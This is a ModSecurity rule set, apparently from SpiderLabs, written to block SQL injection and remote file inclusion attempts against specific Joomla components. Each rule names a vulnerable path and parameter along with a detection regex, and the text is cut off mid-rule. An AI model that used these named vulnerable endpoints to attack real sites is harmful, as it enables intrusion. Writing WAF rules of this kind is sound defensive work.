SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010045,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010046) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010046,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010048) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010048,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ajaxchat/tests/ajcuser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010260,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:GLOBALS\[mosConfig_absolute_path\]\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010349) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010349,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule ARGS:&category "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010350,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule ARGS:&category "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010351) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010351,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule ARGS:&category "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010352) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010352,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule ARGS:&category "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010353,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain" SecRule ARGS:&category "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010474) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_ezine/class/php/d4m_ajax_pagenav.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010474,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37043'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:GLOBALS\[mosConfig_absolute_path\]\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010476,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010477) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010477,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010478,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010479,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010480,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010555) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010555,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010556) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010556,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010557,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010558,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010559,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /acomponents/com_mamboleto/mamboleto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010620,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10369'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010636) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010636,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010637) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010637,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010638,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010639) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010639,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010640,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-comments-post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010659,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_absolute_path "(?i:mosConfig_absolute_path\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_mojo/wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010660,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-trackback.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'" SecRule 